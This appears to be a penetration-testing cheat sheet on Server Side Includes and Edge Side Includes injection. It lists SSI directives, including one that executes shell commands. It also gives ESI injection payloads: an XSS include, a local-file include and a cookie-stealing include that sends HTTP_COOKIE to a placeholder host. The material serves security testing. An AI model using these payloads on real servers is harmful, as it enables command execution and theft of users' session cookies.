XXX Side Includes (ESI/SSI)

Server Side Includes (SSI)

Server Side Includes are Apache directives in HTML files that are evaluated when the file is served.

The directives are usually served in .shtml, .shtm, or .stm. files.

<!--#echo var="DATE_LOCAL" -->
<!--#printenv -->

<!--#include virtual="/cgi-bin/counter.pl" -->
<!--#include virtual="/footer.html" -->

<!--#exec cmd="ls" -->

<!--#fsize file="index.php" -->
<!--#flastmod file="index.php" -->

⚠️ include can include non-html files, but no hidden files.

Edge Side Includes (ESI)

Edge Side Includes (ESI) is an XML-based markup language. It is a set of instructions to efficiently cache web content.

Developers can split an HTML page in multiple fragments. ESI directives within an HTML file instruct HTTP surrogates, such as CNDs or reverse proxies, as to how they should fetch the HTML fragments.

The following header in the response explicitly indicates the use of ESI:

Surrogate-Control: content="ESI/1.0"

<esi: include src=http://IP>
<esi: include src=http://IP/XSSPAYLOAD.html>
<esi: include src=http://IP/cookie_stealer.php?xxx=$(HTTP_COOKIE)>
<esi:include src="lfi.txt">

📚 Refer to the gosecure article.

XXX Side Includes (ESI/SSI) ¶

Server Side Includes (SSI) ¶

Edge Side Includes (ESI) ¶

XXX Side Includes (ESI/SSI)

Server Side Includes (SSI)

Edge Side Includes (ESI)